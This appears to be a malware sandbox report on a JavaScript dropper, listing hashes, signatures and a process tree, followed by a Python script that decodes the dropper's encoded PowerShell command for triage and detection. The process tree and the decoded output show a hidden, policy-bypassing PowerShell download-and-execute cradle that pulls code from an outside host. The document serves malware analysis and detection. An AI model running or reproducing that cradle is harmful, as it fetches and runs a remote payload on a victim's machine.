Analysis

  • max time kernel
    11s
  • max time network
    41s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    10-08-2021 06:44

General

  • Target

    4085.js

  • Size

    776KB

  • MD5

    b6e9c6f1113c92ad6757266ae75769a2

  • SHA1

    9190e8d268db4deb7cd97624b17cba6617244699

  • SHA256

    9fca4b9bb2238dec26fc6b6161dc9d62647883966f1cfd661537fb8c097ff4fe

  • SHA512

    1684c2350b540da9326159455cb57937a2fefc1b97f1231c12cc66ffa601f71ce52096d5c37737d644c49b1c9ae7b5e33eb86890b1405a79d2aa364afbc1f09b

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper: https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php

Signatures

  • Blocklisted process makes network request (1 IoC)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Windows\system32\wscript.exe (PID 1096)
    wscript.exe C:\Users\Admin\AppData\Local\Temp\4085.js
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\cmd.exe (PID 1652, child of 1096)
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
      • Suspicious use of WriteProcessMemory
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 768, child of 1652)
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
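
The -enc argument in the cmd.exe and powershell.exe command lines above is base64 over UTF-16LE text, which is why a plain ASCII decode produces garbage, and the mixed-case poWERshEll and abbreviated switch names are cosmetic: powershell.exe resolves a switch from any unambiguous, case-insensitive prefix of its name. The following Python is an added example, not part of the sandbox report, that normalises those switches the way powershell.exe does, decodes the payload, and pulls out the download cradle and URL; the switch table, regexes and field names are the example's own, and the only input is the command line recorded for PID 1652/768.

```python
"""Decode and triage an encoded PowerShell command line from a process tree."""
import base64
import re

# Encoded blob recorded for the cmd.exe -> powershell.exe hop above
# (identical in both processes). Split only for readability.
REPORTED_ENCODED = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABp"
    "AGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAA"
    "cwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAz"
    "ADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEA"
    "YQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA="
)
REPORTED_CMDLINE = "poWERshEll -nop -w hidden -ep bypass -enc " + REPORTED_ENCODED

# powershell.exe accepts any unambiguous prefix of a switch name, case-insensitively,
# so -enc, -Enco and -e all select -EncodedCommand. Only the switches relevant here.
# (full name, shortest prefix powershell.exe accepts, whether a value follows)
SWITCHES = [
    ("encodedcommand", "e", True),
    ("executionpolicy", "ex", True),
    ("noprofile", "nop", False),
    ("noninteractive", "noni", False),
    ("windowstyle", "w", True),
]
ALIASES = {"ec": "encodedcommand", "ep": "executionpolicy"}  # extra short forms


def normalise_switch(token):
    """Map '-enc', '/NoP', '-w' ... to the full switch name, or None if unknown."""
    name = token.lstrip("-/").lower()
    if name in ALIASES:
        return ALIASES[name]
    for full, shortest, _ in SWITCHES:
        if len(name) >= len(shortest) and full.startswith(name):
            return full
    return None


def parse_powershell_cmdline(cmdline):
    """Return {switch: value or True}. Whitespace tokenising is enough for the
    command line above; quoted arguments would need a real Windows splitter."""
    tokens = cmdline.split()
    takes_value = {full: v for full, _, v in SWITCHES}
    args, i = {}, 1  # token 0 is the executable
    while i < len(tokens):
        tok = tokens[i]
        if tok[:1] in ("-", "/"):
            name = normalise_switch(tok)
            if name and takes_value[name] and i + 1 < len(tokens):
                args[name] = tokens[i + 1]
                i += 2
                continue
            args[name or tok.lower()] = True
        i += 1
    return args


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


URL_RE = re.compile(r"https?://[^\s\"'()]+", re.I)
# IEX / Invoke-Expression wrapped around a DownloadString call, in either order.
CRADLE_RE = re.compile(
    r"(iex|invoke-expression)\b.*downloadstring|downloadstring.*\|\s*(iex|invoke-expression)",
    re.I | re.S,
)


def triage(cmdline):
    """Summarise the evasion switches and, if present, the decoded payload."""
    args = parse_powershell_cmdline(cmdline)
    report = {
        "no_profile": args.get("noprofile") is True,
        "hidden_window": str(args.get("windowstyle", "")).lower() == "hidden",
        "policy_bypass": str(args.get("executionpolicy", "")).lower() == "bypass",
        "encoded": "encodedcommand" in args,
        "script": None,
        "urls": [],
        "download_cradle": False,
    }
    if report["encoded"]:
        script = decode_encoded_command(args["encodedcommand"])
        report["script"] = script
        report["urls"] = URL_RE.findall(script)
        report["download_cradle"] = CRADLE_RE.search(script) is not None
    return report


if __name__ == "__main__":
    for key, value in triage(REPORTED_CMDLINE).items():
        print(f"{key:16} {value}")
```

Run against the recorded command line, this yields the one-liner `IEX (New-Object Net.Webclient).downloadstring("https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php")`, the same URL the Malware Config section lists as ps1.dropper. Matching on the full switch name after normalisation, rather than on the literal `-enc` or `powershell` spelling, is what keeps a detection from being defeated by the casing and abbreviation seen here.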

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery
    System Information Discovery, T1082 (1)

Downloads

  • memory/768-60-0x0000000000000000-mapping.dmp
  • memory/768-61-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp
    Filesize

    8KB

  • memory/768-62-0x0000000002360000-0x0000000002361000-memory.dmp
    Filesize

    4KB

  • memory/768-63-0x000000001AC80000-0x000000001AC81000-memory.dmp
    Filesize

    4KB

  • memory/768-64-0x00000000023B0000-0x00000000023B1000-memory.dmp
    Filesize

    4KB

  • memory/768-65-0x00000000024E0000-0x00000000024E1000-memory.dmp
    Filesize

    4KB

  • memory/768-67-0x000000001AC04000-0x000000001AC06000-memory.dmp
    Filesize

    8KB

  • memory/768-66-0x000000001AC00000-0x000000001AC02000-memory.dmp
    Filesize

    8KB

  • memory/768-68-0x000000001C500000-0x000000001C501000-memory.dmp
    Filesize

    4KB

  • memory/1652-59-0x0000000000000000-mapping.dmp